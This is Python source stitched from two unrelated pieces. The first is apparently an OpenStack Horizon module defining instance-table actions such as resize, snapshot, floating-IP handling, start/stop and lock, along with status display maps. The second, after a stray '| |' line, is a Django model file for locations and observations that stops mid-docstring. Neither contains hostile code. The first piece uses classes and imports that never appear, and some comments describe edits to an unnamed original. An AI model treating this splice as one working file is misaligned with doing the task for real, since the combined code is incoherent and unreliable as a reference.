class LaunchLinkNG(LaunchLink):
    """Angular ("next generation") variant of the launch-instance button."""
    name = "launch-ng"
    url = "horizon:project:instances:index"
    ajax = False
    classes = ("btn-launch", )

    def get_default_attrs(self):
        # Wire the button to the Angular launch-instance wizard modal.
        success_url = urlresolvers.reverse(self.url)
        ngclick = "modal.openLaunchInstanceWizard(" \
                  "{ successUrl: '%s' })" % success_url
        self.attrs.update({
            'ng-controller': 'LaunchInstanceModalController as modal',
            'ng-click': ngclick
        })
        return super(LaunchLinkNG, self).get_default_attrs()

    def get_link_url(self, datum=None):
        # Navigation happens through ng-click, so the href is inert.
        return "javascript:void(0);"
class EditInstance(policy.PolicyTargetMixin, tables.LinkAction):
    """Link action opening the update-instance workflow in a modal."""
    name = "edit"
    verbose_name = _("Edit Instance")
    url = "horizon:project:instances:update"
    classes = ("ajax-modal",)
    icon = "pencil"
    policy_rules = (("compute", "compute:update"),)
    def get_link_url(self, project):
        """Open the workflow at the instance-info step."""
        return self._get_link_url(project, 'instance_info')
    def _get_link_url(self, project, step_slug):
        """Build the workflow URL carrying the step and a redirect target."""
        base_url = urlresolvers.reverse(self.url, args=[project.id])
        next_url = self.table.get_full_url()
        params = {"step": step_slug,
                  update_instance.UpdateInstance.redirect_param_name: next_url}
        param = urlencode(params)
        return "?".join([base_url, param])
    def allowed(self, request, instance):
        # Hide the action while the instance is being deleted.
        return not is_deleting(instance)
class EditInstanceSecurityGroups(EditInstance):
    """Edit-instance variant that opens at the security-groups step."""
    name = "edit_secgroups"
    verbose_name = _("Edit Security Groups")

    def get_link_url(self, project):
        return self._get_link_url(project, 'update_security_groups')

    def allowed(self, request, instance=None):
        # Only for active instances owned by the requesting tenant.
        if instance.status not in ACTIVE_STATES:
            return False
        if is_deleting(instance):
            return False
        return request.user.tenant_id == instance.tenant_id
class CreateSnapshot(policy.PolicyTargetMixin, tables.LinkAction):
    """Link action opening the create-snapshot modal for an instance."""
    name = "snapshot"
    verbose_name = _("Create Snapshot")
    url = "horizon:project:images:snapshots:create"
    classes = ("ajax-modal",)
    icon = "camera"
    policy_rules = (("compute", "compute:snapshot"),)

    def allowed(self, request, instance=None):
        # Snapshots are only possible from a quiescent-enough state.
        ready = instance.status in SNAPSHOT_READY_STATES
        return ready and not is_deleting(instance)
class ConsoleLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Link action opening the console tab on the instance detail page."""
    name = "console"
    verbose_name = _("Console")
    url = "horizon:project:instances:detail"
    classes = ("btn-console",)
    policy_rules = (("compute", "compute_extension:consoles"),)
    def allowed(self, request, instance=None):
        # We check if ConsoleLink is allowed only if settings.CONSOLE_TYPE is
        # not set at all, or if it's set to any value other than None or False.
        return bool(getattr(settings, 'CONSOLE_TYPE', True)) and \
            instance.status in ACTIVE_STATES and not is_deleting(instance)
    def get_link_url(self, datum):
        """Append the console tab's query string to the detail-page URL."""
        base_url = super(ConsoleLink, self).get_link_url(datum)
        tab_query_string = tabs.ConsoleTab(
            tabs.InstanceDetailTabs).get_query_string()
        return "?".join([base_url, tab_query_string])
class LogLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Link action showing the console-log tab on the instance detail page."""
    name = "log"
    verbose_name = _("View Log")
    url = "horizon:project:instances:detail"
    classes = ("btn-log",)
    policy_rules = (("compute", "compute_extension:console_output"),)

    def allowed(self, request, instance=None):
        if instance.status not in ACTIVE_STATES:
            return False
        return not is_deleting(instance)

    def get_link_url(self, datum):
        # Point at the detail page with the log tab pre-selected.
        detail_url = super(LogLink, self).get_link_url(datum)
        query = tabs.LogTab(tabs.InstanceDetailTabs).get_query_string()
        return "?".join([detail_url, query])
class ResizeLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Link action opening the resize-instance workflow in a modal."""
    name = "resize"
    verbose_name = _("Resize Instance")
    url = "horizon:project:instances:resize"
    classes = ("ajax-modal", "btn-resize")
    policy_rules = (("compute", "compute:resize"),)
    def get_link_url(self, project):
        """Open the workflow at the flavor-choice step."""
        return self._get_link_url(project, 'flavor_choice')
    def _get_link_url(self, project, step_slug):
        """Build the workflow URL carrying the step and a redirect target."""
        base_url = urlresolvers.reverse(self.url, args=[project.id])
        next_url = self.table.get_full_url()
        params = {"step": step_slug,
                  resize_instance.ResizeInstance.redirect_param_name: next_url}
        param = urlencode(params)
        return "?".join([base_url, param])
    def allowed(self, request, instance):
        # Resizable when active or shut off, and not being deleted.
        return ((instance.status in ACTIVE_STATES
                 or instance.status == 'SHUTOFF')
                and not is_deleting(instance))
class ConfirmResize(policy.PolicyTargetMixin, tables.Action):
    """Confirm a resize/migrate that nova is holding for verification."""
    name = "confirm"
    verbose_name = _("Confirm Resize/Migrate")
    classes = ("btn-confirm", "btn-action-required")
    policy_rules = (("compute", "compute:confirm_resize"),)

    def allowed(self, request, instance):
        # Only meaningful while the resize awaits user verification.
        return instance.status == 'VERIFY_RESIZE'

    def single(self, table, request, instance):
        api.nova.server_confirm_resize(request, instance)
class RevertResize(policy.PolicyTargetMixin, tables.Action):
    """Revert a resize/migrate that nova is holding for verification."""
    name = "revert"
    verbose_name = _("Revert Resize/Migrate")
    classes = ("btn-revert", "btn-action-required")
    policy_rules = (("compute", "compute:revert_resize"),)
    def allowed(self, request, instance):
        # Only meaningful while the resize awaits user verification.
        return instance.status == 'VERIFY_RESIZE'
    def single(self, table, request, instance):
        api.nova.server_revert_resize(request, instance)
class RebuildInstance(policy.PolicyTargetMixin, tables.LinkAction):
    """Link action opening the rebuild-instance modal."""
    name = "rebuild"
    verbose_name = _("Rebuild Instance")
    classes = ("btn-rebuild", "ajax-modal")
    url = "horizon:project:instances:rebuild"
    policy_rules = (("compute", "compute:rebuild"),)
    def allowed(self, request, instance):
        # Rebuild is possible when active or shut off, and not being deleted.
        return ((instance.status in ACTIVE_STATES
                 or instance.status == 'SHUTOFF')
                and not is_deleting(instance))
    def get_link_url(self, datum):
        """Link to the rebuild view for this row's instance."""
        instance_id = self.table.get_object_id(datum)
        return urlresolvers.reverse(self.url, args=[instance_id])
class DecryptInstancePassword(tables.LinkAction):
    """Link action opening the retrieve-password modal.

    Only offered when OPENSTACK_ENABLE_PASSWORD_RETRIEVE is enabled and
    the instance was booted with a keypair (needed to decrypt).
    """
    name = "decryptpassword"
    verbose_name = _("Retrieve Password")
    classes = ("btn-decrypt", "ajax-modal")
    url = "horizon:project:instances:decryptpassword"
    def allowed(self, request, instance):
        # Feature flag; defaults to disabled.
        enable = getattr(settings,
                         'OPENSTACK_ENABLE_PASSWORD_RETRIEVE',
                         False)
        # get_keyname is defined elsewhere in this module; a keypair is
        # required for password decryption.
        return (enable
                and (instance.status in ACTIVE_STATES
                     or instance.status == 'SHUTOFF')
                and not is_deleting(instance)
                and get_keyname(instance) is not None)
    def get_link_url(self, datum):
        """Link to the decrypt view, parameterised by instance and keypair."""
        instance_id = self.table.get_object_id(datum)
        keypair_name = get_keyname(datum)
        return urlresolvers.reverse(self.url, args=[instance_id,
                                                    keypair_name])
class AssociateIP(policy.PolicyTargetMixin, tables.LinkAction):
    """Link action opening the associate-floating-IP workflow."""
    name = "associate"
    verbose_name = _("Associate Floating IP")
    url = "horizon:project:access_and_security:floating_ips:associate"
    classes = ("ajax-modal",)
    icon = "link"
    policy_rules = (("compute", "network:associate_floating_ip"),)

    def allowed(self, request, instance):
        if not api.network.floating_ip_supported(request):
            return False
        # The one-click variant (SimpleAssociateIP) takes over when simple
        # association is supported.
        if api.network.floating_ip_simple_associate_supported(request):
            return False
        if instance.status == "ERROR":
            return False
        # Hide the action once the instance already has a floating address.
        has_floating = any(
            address.get('OS-EXT-IPS:type') == "floating"
            for addresses in instance.addresses.values()
            for address in addresses)
        if has_floating:
            return False
        return not is_deleting(instance)

    def get_link_url(self, datum):
        # Pre-select this instance in the workflow and return here after.
        base_url = urlresolvers.reverse(self.url)
        next_url = self.table.get_full_url()
        params = urlencode({
            "instance_id": self.table.get_object_id(datum),
            workflows.IPAssociationWorkflow.redirect_param_name: next_url})
        return "?".join([base_url, params])
class SimpleAssociateIP(policy.PolicyTargetMixin, tables.Action):
    """One-click action that allocates and associates a floating IP."""
    name = "associate-simple"
    verbose_name = _("Associate Floating IP")
    icon = "link"
    policy_rules = (("compute", "network:associate_floating_ip"),)
    def allowed(self, request, instance):
        # Only shown where the backend supports single-step association.
        if not api.network.floating_ip_simple_associate_supported(request):
            return False
        if instance.status == "ERROR":
            return False
        return not is_deleting(instance)
    def single(self, table, request, instance_id):
        try:
            # target_id is port_id for Neutron and instance_id for Nova Network
            # (Neutron API wrapper returns a 'portid_fixedip' string)
            target_id = api.network.floating_ip_target_get_by_instance(
                request, instance_id).split('_')[0]
            fip = api.network.tenant_floating_ip_allocate(request)
            api.network.floating_ip_associate(request, fip.id, target_id)
            messages.success(request,
                             _("Successfully associated floating IP: %s")
                             % fip.ip)
        except Exception:
            # Best-effort: surface the failure as a user-facing message.
            exceptions.handle(request,
                              _("Unable to associate floating IP."))
        return shortcuts.redirect(request.get_full_path())
class SimpleDisassociateIP(policy.PolicyTargetMixin, tables.Action):
    """One-click action that removes a floating IP from an instance."""
    name = "disassociate"
    verbose_name = _("Disassociate Floating IP")
    classes = ("btn-danger", "btn-disassociate",)
    policy_rules = (("compute", "network:disassociate_floating_ip"),)
    def allowed(self, request, instance):
        """Only offered when floating IPs are supported, simple IP
        management is enabled, and the instance has a floating address."""
        if not api.network.floating_ip_supported(request):
            return False
        if not conf.HORIZON_CONFIG["simple_ip_management"]:
            return False
        for addresses in instance.addresses.values():
            for address in addresses:
                if address.get('OS-EXT-IPS:type') == "floating":
                    return not is_deleting(instance)
        return False
    def single(self, table, request, instance_id):
        try:
            # target_id is port_id for Neutron and instance_id for Nova Network
            # (Neutron API wrapper returns a 'portid_fixedip' string)
            targets = api.network.floating_ip_target_list_by_instance(
                request, instance_id)
            target_ids = [t.split('_')[0] for t in targets]
            fips = [fip for fip in api.network.tenant_floating_ip_list(request)
                    if fip.port_id in target_ids]
            # Removing multiple floating IPs at once doesn't work, so this pops
            # off the first one.
            if fips:
                fip = fips.pop()
                api.network.floating_ip_disassociate(request, fip.id)
                messages.success(request,
                                 _("Successfully disassociated "
                                   "floating IP: %s") % fip.ip)
            else:
                messages.info(request, _("No floating IPs to disassociate."))
        except Exception:
            # Best-effort: surface the failure as a user-facing message.
            exceptions.handle(request,
                              _("Unable to disassociate floating IP."))
        return shortcuts.redirect(request.get_full_path())
def instance_fault_to_friendly_message(instance):
    """Translate a nova fault record into a user-friendly message.

    Known fault codes get a tailored message; anything else falls back to
    a generic "try again later" message embedding the raw fault text.
    """
    fault = getattr(instance, 'fault', {})
    message = fault.get('message', _("Unknown"))
    default_message = _("Please try again later [Error: %s].") % message
    fault_map = {
        'NoValidHost': _("There is not enough capacity for this "
                         "flavor in the selected availability zone. "
                         "Try again later or select a different availability "
                         "zone.")
    }
    return fault_map.get(message, default_message)
def get_instance_error(instance):
    """Return a user-facing error message for an instance in ERROR state.

    :returns: the composed message, or None when the instance is not in
        an error state.
    """
    if instance.status.lower() != 'error':
        return None
    message = instance_fault_to_friendly_message(instance)
    # Fall back to the instance id when the name is empty. The parentheses
    # are required: "%" binds tighter than "or", so without them the
    # expression was "(fmt % name) or id" and the fallback never applied.
    preamble = _('Failed to perform requested operation on instance "%s", the '
                 'instance has an error status') % (instance.name or instance.id)
    message = string_concat(preamble, ': ', message)
    return message
class UpdateRow(tables.Row):
    """AJAX row handler that refreshes a single instance's table row."""
    ajax = True
    def get_data(self, request, instance_id):
        """Fetch fresh instance data (and its full flavor) for the row."""
        instance = api.nova.server_get(request, instance_id)
        try:
            instance.full_flavor = api.nova.flavor_get(request,
                                                       instance.flavor["id"])
        except Exception:
            # Flavor lookup is cosmetic; keep the row even if it fails.
            exceptions.handle(request,
                              _('Unable to retrieve flavor information '
                                'for instance "%s".') % instance_id,
                              ignore=True)
        # Surface an error banner when the instance is in ERROR state.
        error = get_instance_error(instance)
        if error:
            messages.error(request, error)
        return instance
class StartInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that powers on stopped instances."""
    name = "start"
    classes = ('btn-confirm',)
    policy_rules = (("compute", "compute:start"),)

    @staticmethod
    def action_present(count):
        """Return the pluralised button label."""
        return ungettext_lazy(
            u"Start Instance",
            u"Start Instances",
            count
        )

    @staticmethod
    def action_past(count):
        """Return the pluralised post-action label."""
        return ungettext_lazy(
            u"Started Instance",
            u"Started Instances",
            count
        )

    def allowed(self, request, instance):
        # Table-level check (no row bound): always allowed.
        if instance is None:
            return True
        return instance.status in ("SHUTDOWN", "SHUTOFF", "CRASHED")

    def action(self, request, obj_id):
        api.nova.server_start(request, obj_id)
class StopInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that shuts off running or suspended instances."""
    name = "stop"
    classes = ('btn-danger',)
    policy_rules = (("compute", "compute:stop"),)
    help_text = _("To power off a specific instance.")

    @staticmethod
    def action_present(count):
        return npgettext_lazy(
            "Action to perform (the instance is currently running)",
            u"Shut Off Instance",
            u"Shut Off Instances",
            count
        )

    @staticmethod
    def action_past(count):
        return npgettext_lazy(
            "Past action (the instance is currently already Shut Off)",
            u"Shut Off Instance",
            u"Shut Off Instances",
            count
        )

    def allowed(self, request, instance):
        # A None instance means "table-level" availability.
        if instance is None:
            return True
        return (get_power_state(instance) in ("RUNNING", "SUSPENDED")
                and not is_deleting(instance))

    def action(self, request, obj_id):
        api.nova.server_stop(request, obj_id)
class LockInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that locks instances against state-changing operations."""
    name = "lock"
    policy_rules = (("compute", "compute_extension:admin_actions:lock"),)

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Lock Instance",
            u"Lock Instances",
            count
        )

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Locked Instance",
            u"Locked Instances",
            count
        )

    # TODO(akrivoka): When the lock status is added to nova, revisit this
    # to only allow unlocked instances to be locked
    def allowed(self, request, instance):
        # Only available when nova exposes the AdminActions extension.
        return bool(api.nova.extension_supported('AdminActions', request))

    def action(self, request, obj_id):
        api.nova.server_lock(request, obj_id)
class UnlockInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that removes the lock from instances."""
    name = "unlock"
    policy_rules = (("compute", "compute_extension:admin_actions:unlock"),)

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Unlock Instance",
            u"Unlock Instances",
            count
        )

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Unlocked Instance",
            u"Unlocked Instances",
            count
        )

    # TODO(akrivoka): When the lock status is added to nova, revisit this
    # to only allow locked instances to be unlocked
    def allowed(self, request, instance):
        # Only available when nova exposes the AdminActions extension.
        return bool(api.nova.extension_supported('AdminActions', request))

    def action(self, request, obj_id):
        api.nova.server_unlock(request, obj_id)
class AttachInterface(policy.PolicyTargetMixin, tables.LinkAction):
    """Modal link action for attaching a network interface to an instance."""
    name = "attach_interface"
    verbose_name = _("Attach Interface")
    classes = ("btn-confirm", "ajax-modal")
    url = "horizon:project:instances:attach_interface"
    policy_rules = (("compute", "compute_extension:attach_interfaces"),)

    def allowed(self, request, instance):
        # Keep the cheap status checks first; the service-enabled check
        # is only evaluated when they pass.
        status_ok = (instance.status in ACTIVE_STATES
                     or instance.status == 'SHUTOFF')
        return (status_ok
                and not is_deleting(instance)
                and api.base.is_service_enabled(request, 'network'))

    def get_link_url(self, datum):
        return urlresolvers.reverse(self.url,
                                    args=[self.table.get_object_id(datum)])
# TODO(lyj): the policy for detach interface not exists in nova.json,
# once it's added, it should be added here.
class DetachInterface(policy.PolicyTargetMixin, tables.LinkAction):
    """Modal link action for detaching a network interface from an instance."""
    name = "detach_interface"
    verbose_name = _("Detach Interface")
    classes = ("btn-confirm", "ajax-modal")
    url = "horizon:project:instances:detach_interface"

    def allowed(self, request, instance):
        # Keep the cheap status checks first; the service-enabled check
        # is only evaluated when they pass.
        status_ok = (instance.status in ACTIVE_STATES
                     or instance.status == 'SHUTOFF')
        return (status_ok
                and not is_deleting(instance)
                and api.base.is_service_enabled(request, 'network'))

    def get_link_url(self, datum):
        return urlresolvers.reverse(self.url,
                                    args=[self.table.get_object_id(datum)])
def get_ips(instance):
    """Render the instance's addresses, grouped by network, as HTML.

    Each network maps to a dict with separate "floating" and
    "non_floating" address lists.
    """
    template_name = 'project/instances/_instance_ips.html'
    ip_groups = {}
    for network, addresses in six.iteritems(instance.addresses):
        floating = []
        non_floating = []
        for address in addresses:
            is_floating = ('OS-EXT-IPS:type' in address and
                           address['OS-EXT-IPS:type'] == "floating")
            if is_floating:
                floating.append(address)
            else:
                non_floating.append(address)
        ip_groups[network] = {"floating": floating,
                              "non_floating": non_floating}
    return template.loader.render_to_string(template_name,
                                            {"ip_groups": ip_groups})
def get_size(instance):
    """Render the instance's flavor (name, RAM, disk, vCPUs) as HTML.

    Falls back to "Not available" when the flavor was not resolved.
    """
    if not hasattr(instance, "full_flavor"):
        return _("Not available")
    flavor = instance.full_flavor
    size_ram = sizeformat.mb_float_format(flavor.ram)
    if flavor.disk > 0:
        size_disk = sizeformat.diskgbformat(flavor.disk)
    else:
        size_disk = _("%s GB") % "0"
    context = {
        "name": flavor.name,
        "id": instance.id,
        "size_disk": size_disk,
        "size_ram": size_ram,
        "vcpus": flavor.vcpus,
        "flavor_id": flavor.id
    }
    return template.loader.render_to_string(
        'project/instances/_instance_flavor.html', context)
def get_keyname(instance):
    """Return the instance's key pair name, or "Not available"."""
    if hasattr(instance, "key_name"):
        return instance.key_name
    return _("Not available")
def get_power_state(instance):
    """Map the instance's raw nova power-state code to its display name.

    Missing attribute defaults to code 0; unknown codes render as ''.
    """
    raw_state = getattr(instance, "OS-EXT-STS:power_state", 0)
    return POWER_STATES.get(raw_state, '')
# Maps a lower-cased nova instance status to its translated display name.
# The duplicate ("deleted", ...) entry present in the original has been
# removed; it was redundant, as lookups match the first occurrence.
STATUS_DISPLAY_CHOICES = (
    ("deleted", pgettext_lazy("Current status of an Instance", u"Deleted")),
    ("active", pgettext_lazy("Current status of an Instance", u"Active")),
    ("shutoff", pgettext_lazy("Current status of an Instance", u"Shutoff")),
    ("suspended", pgettext_lazy("Current status of an Instance",
                                u"Suspended")),
    ("paused", pgettext_lazy("Current status of an Instance", u"Paused")),
    ("error", pgettext_lazy("Current status of an Instance", u"Error")),
    ("resize", pgettext_lazy("Current status of an Instance",
                             u"Resize/Migrate")),
    ("verify_resize", pgettext_lazy("Current status of an Instance",
                                    u"Confirm or Revert Resize/Migrate")),
    ("revert_resize", pgettext_lazy(
        "Current status of an Instance", u"Revert Resize/Migrate")),
    ("reboot", pgettext_lazy("Current status of an Instance", u"Reboot")),
    ("hard_reboot", pgettext_lazy("Current status of an Instance",
                                  u"Hard Reboot")),
    ("password", pgettext_lazy("Current status of an Instance", u"Password")),
    ("rebuild", pgettext_lazy("Current status of an Instance", u"Rebuild")),
    ("migrating", pgettext_lazy("Current status of an Instance",
                                u"Migrating")),
    ("build", pgettext_lazy("Current status of an Instance", u"Build")),
    ("rescue", pgettext_lazy("Current status of an Instance", u"Rescue")),
    ("soft_deleted", pgettext_lazy("Current status of an Instance",
                                   u"Soft Deleted")),
    ("shelved", pgettext_lazy("Current status of an Instance", u"Shelved")),
    ("shelved_offloaded", pgettext_lazy("Current status of an Instance",
                                        u"Shelved Offloaded")),
)
# Display value used when an instance has no task in progress.
TASK_DISPLAY_NONE = pgettext_lazy("Task status of an Instance", u"None")
# Mapping of task states taken from Nova's nova/compute/task_states.py
# Maps a raw nova task state to its translated display name.
TASK_DISPLAY_CHOICES = (
    ("scheduling", pgettext_lazy("Task status of an Instance",
                                 u"Scheduling")),
    ("block_device_mapping", pgettext_lazy("Task status of an Instance",
                                           u"Block Device Mapping")),
    ("networking", pgettext_lazy("Task status of an Instance",
                                 u"Networking")),
    ("spawning", pgettext_lazy("Task status of an Instance", u"Spawning")),
    ("image_snapshot", pgettext_lazy("Task status of an Instance",
                                     u"Snapshotting")),
    ("image_snapshot_pending", pgettext_lazy("Task status of an Instance",
                                             u"Image Snapshot Pending")),
    ("image_pending_upload", pgettext_lazy("Task status of an Instance",
                                           u"Image Pending Upload")),
    ("image_uploading", pgettext_lazy("Task status of an Instance",
                                      u"Image Uploading")),
    ("image_backup", pgettext_lazy("Task status of an Instance",
                                   u"Image Backup")),
    ("updating_password", pgettext_lazy("Task status of an Instance",
                                        u"Updating Password")),
    ("resize_prep", pgettext_lazy("Task status of an Instance",
                                  u"Preparing Resize or Migrate")),
    ("resize_migrating", pgettext_lazy("Task status of an Instance",
                                       u"Resizing or Migrating")),
    ("resize_migrated", pgettext_lazy("Task status of an Instance",
                                      u"Resized or Migrated")),
    ("resize_finish", pgettext_lazy("Task status of an Instance",
                                    u"Finishing Resize or Migrate")),
    ("resize_reverting", pgettext_lazy("Task status of an Instance",
                                       u"Reverting Resize or Migrate")),
    ("resize_confirming", pgettext_lazy("Task status of an Instance",
                                        u"Confirming Resize or Migrate")),
    ("rebooting", pgettext_lazy("Task status of an Instance", u"Rebooting")),
    ("reboot_pending", pgettext_lazy("Task status of an Instance",
                                     u"Reboot Pending")),
    ("reboot_started", pgettext_lazy("Task status of an Instance",
                                     u"Reboot Started")),
    ("rebooting_hard", pgettext_lazy("Task status of an Instance",
                                     u"Rebooting Hard")),
    ("reboot_pending_hard", pgettext_lazy("Task status of an Instance",
                                          u"Reboot Pending Hard")),
    ("reboot_started_hard", pgettext_lazy("Task status of an Instance",
                                          u"Reboot Started Hard")),
    ("pausing", pgettext_lazy("Task status of an Instance", u"Pausing")),
    ("unpausing", pgettext_lazy("Task status of an Instance", u"Resuming")),
    ("suspending", pgettext_lazy("Task status of an Instance",
                                 u"Suspending")),
    ("resuming", pgettext_lazy("Task status of an Instance", u"Resuming")),
    ("powering-off", pgettext_lazy("Task status of an Instance",
                                   u"Powering Off")),
    ("powering-on", pgettext_lazy("Task status of an Instance",
                                  u"Powering On")),
    ("rescuing", pgettext_lazy("Task status of an Instance", u"Rescuing")),
    ("unrescuing", pgettext_lazy("Task status of an Instance",
                                 u"Unrescuing")),
    ("rebuilding", pgettext_lazy("Task status of an Instance",
                                 u"Rebuilding")),
    ("rebuild_block_device_mapping", pgettext_lazy(
        "Task status of an Instance", u"Rebuild Block Device Mapping")),
    ("rebuild_spawning", pgettext_lazy("Task status of an Instance",
                                       u"Rebuild Spawning")),
    ("migrating", pgettext_lazy("Task status of an Instance", u"Migrating")),
    ("deleting", pgettext_lazy("Task status of an Instance", u"Deleting")),
    ("soft-deleting", pgettext_lazy("Task status of an Instance",
                                    u"Soft Deleting")),
    ("restoring", pgettext_lazy("Task status of an Instance", u"Restoring")),
    ("shelving", pgettext_lazy("Task status of an Instance", u"Shelving")),
    ("shelving_image_pending_upload", pgettext_lazy(
        "Task status of an Instance", u"Shelving Image Pending Upload")),
    ("shelving_image_uploading", pgettext_lazy("Task status of an Instance",
                                               u"Shelving Image Uploading")),
    ("shelving_offloading", pgettext_lazy("Task status of an Instance",
                                          u"Shelving Offloading")),
    ("unshelving", pgettext_lazy("Task status of an Instance",
                                 u"Unshelving")),
)
# Maps a power-state name (as produced by get_power_state) to its
# translated display name.
POWER_DISPLAY_CHOICES = (
    ("NO STATE", pgettext_lazy("Power state of an Instance", u"No State")),
    ("RUNNING", pgettext_lazy("Power state of an Instance", u"Running")),
    ("BLOCKED", pgettext_lazy("Power state of an Instance", u"Blocked")),
    ("PAUSED", pgettext_lazy("Power state of an Instance", u"Paused")),
    ("SHUTDOWN", pgettext_lazy("Power state of an Instance", u"Shut Down")),
    ("SHUTOFF", pgettext_lazy("Power state of an Instance", u"Shut Off")),
    ("CRASHED", pgettext_lazy("Power state of an Instance", u"Crashed")),
    ("SUSPENDED", pgettext_lazy("Power state of an Instance", u"Suspended")),
    ("FAILED", pgettext_lazy("Power state of an Instance", u"Failed")),
    ("BUILDING", pgettext_lazy("Power state of an Instance", u"Building")),
)
class InstancesFilterAction(tables.FilterAction):
    """Server-side filter for the instances table.

    Each choice is (field, label, API-filterable); all four fields are
    filtered by the nova API rather than client-side.
    """
    filter_type = "server"
    filter_choices = (('name', _("Instance Name"), True),
                      ('status', _("Status ="), True),
                      ('image', _("Image ID ="), True),
                      ('flavor', _("Flavor ID ="), True))
class InstancesTable(tables.DataTable):
    """Main project-dashboard table listing the user's nova instances."""
    # Task states considered "settled": rows in these states stop ajax polling.
    TASK_STATUS_CHOICES = (
        (None, True),
        ("none", True)
    )
    # (status, is-settled) pairs; False keeps 'error' rows flagged.
    STATUS_CHOICES = (
        ("active", True),
        ("shutoff", True),
        ("suspended", True),
        ("paused", True),
        ("error", False),
        ("rescue", True),
        ("shelved", True),
        ("shelved_offloaded", True),
    )
    name = tables.Column("name",
                         link="horizon:project:instances:detail",
                         verbose_name=_("Instance Name"))
    image_name = tables.Column("image_name",
                               verbose_name=_("Image Name"))
    # Rendered by get_ips (grouped floating/fixed addresses).
    ip = tables.Column(get_ips,
                       verbose_name=_("IP Address"),
                       attrs={'data-type': "ip"})
    # Rendered by get_size (flavor name, RAM, disk, vCPUs).
    size = tables.Column(get_size,
                         verbose_name=_("Size"),
                         attrs={'data-type': 'size'})
    keypair = tables.Column(get_keyname, verbose_name=_("Key Pair"))
    status = tables.Column("status",
                           filters=(title, filters.replace_underscores),
                           verbose_name=_("Status"),
                           status=True,
                           status_choices=STATUS_CHOICES,
                           display_choices=STATUS_DISPLAY_CHOICES)
    az = tables.Column("availability_zone",
                       verbose_name=_("Availability Zone"))
    task = tables.Column("OS-EXT-STS:task_state",
                         verbose_name=_("Task"),
                         empty_value=TASK_DISPLAY_NONE,
                         status=True,
                         status_choices=TASK_STATUS_CHOICES,
                         display_choices=TASK_DISPLAY_CHOICES)
    state = tables.Column(get_power_state,
                          filters=(title, filters.replace_underscores),
                          verbose_name=_("Power State"),
                          display_choices=POWER_DISPLAY_CHOICES)
    created = tables.Column("created",
                            verbose_name=_("Time since created"),
                            filters=(filters.parse_isotime,
                                     filters.timesince_sortable),
                            attrs={'data-type': 'timesince'})

    class Meta(object):
        name = "instances"
        verbose_name = _("Instances")
        status_columns = ["status", "task"]
        row_class = UpdateRow
        table_actions_menu = (StartInstance, StopInstance, SoftRebootInstance)
        # Show the legacy and/or Angular launch buttons depending on settings;
        # both may be enabled at once.
        launch_actions = ()
        if getattr(settings, 'LAUNCH_INSTANCE_LEGACY_ENABLED', True):
            launch_actions = (LaunchLink,) + launch_actions
        if getattr(settings, 'LAUNCH_INSTANCE_NG_ENABLED', False):
            launch_actions = (LaunchLinkNG,) + launch_actions
        table_actions = launch_actions + (TerminateInstance,
                                          InstancesFilterAction)
        row_actions = (StartInstance, ConfirmResize, RevertResize,
                       CreateSnapshot, SimpleAssociateIP, AssociateIP,
                       SimpleDisassociateIP, AttachInterface,
                       DetachInterface, EditInstance,
                       DecryptInstancePassword, EditInstanceSecurityGroups,
                       ConsoleLink, LogLink, TogglePause, ToggleSuspend,
                       ResizeLink, LockInstance, UnlockInstance,
                       SoftRebootInstance, RebootInstance,
                       StopInstance, RebuildInstance, TerminateInstance)
| |
from pytz import utc
from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.exceptions import ValidationError
from django.dispatch import receiver
from django.db.models.signals import pre_save, post_save
from django_pgjson.fields import JsonBField
from simple_history.models import HistoricalRecords
from geokey.core.exceptions import InputError
from .base import OBSERVATION_STATUS, COMMENT_STATUS, COMMENT_REVIEW
from .manager import ObservationManager, CommentManager
from django.contrib.gis.db import models as gis
from .base import LOCATION_STATUS
from .manager import LocationManager
from .manager import MediaFileManager
from .base import MEDIA_STATUS
class Location(models.Model):
    """
    Represents a location to which an arbitrary number of observations can be
    attached.
    """
    name = models.CharField(max_length=100, blank=True, null=True)
    description = models.TextField(blank=True, null=True)
    # Any geometry type (point, line, polygon); stored as geography.
    geometry = gis.GeometryField(geography=True)
    created_at = models.DateTimeField(auto_now_add=True)
    creator = models.ForeignKey(settings.AUTH_USER_MODEL)
    version = models.IntegerField(default=1)
    # Private locations are only reusable within private_for_project.
    private = models.BooleanField(default=False)
    private_for_project = models.ForeignKey('projects.Project', null=True)
    status = models.CharField(
        choices=LOCATION_STATUS,
        default=LOCATION_STATUS.active,
        max_length=20
    )
    objects = LocationManager()
class Observation(models.Model):
    """
    Stores a single observation.
    """
    location = models.ForeignKey(
        Location, related_name='locations'
    )
    project = models.ForeignKey(
        'projects.Project', related_name='observations'
    )
    category = models.ForeignKey('categories.Category')
    status = models.CharField(
        choices=OBSERVATION_STATUS,
        default=OBSERVATION_STATUS.active,
        max_length=20
    )
    # Use the `dict` callable rather than the literal `{}`: a mutable
    # literal default is shared between all model instances.
    properties = JsonBField(default=dict)
    created_at = models.DateTimeField(auto_now_add=True)
    creator = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        related_name='creator'
    )
    updated_at = models.DateTimeField(null=True, auto_now_add=True)
    updator = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        related_name='updator',
        null=True
    )
    version = models.IntegerField(default=1)
    # Cache of 'key:value' pairs used for free-text filtering; rebuilt by
    # update_search_matches() through the pre_save signal.
    search_matches = models.TextField()
    # Cached 'key:value' of the category's display field; rebuilt by
    # update_display_field() through the pre_save signal.
    display_field = models.TextField(null=True, blank=True)
    num_media = models.IntegerField(default=0)
    num_comments = models.IntegerField(default=0)
    history = HistoricalRecords()
    objects = ObservationManager()

    class Meta:
        ordering = ['-updated_at', 'id']

    @classmethod
    def validate_partial(cls, category, data):
        """
        Validates the data against the category field definition. This is a
        partial validation, which is used to validate drafts; field values
        that are not provided are not validated.

        Parameter
        ---------
        category : geokey.categories.models.Category
            Category that the data is validated against
        data : dict
            Dictionary of key-value-pairs; incoming data that is validated

        Raises
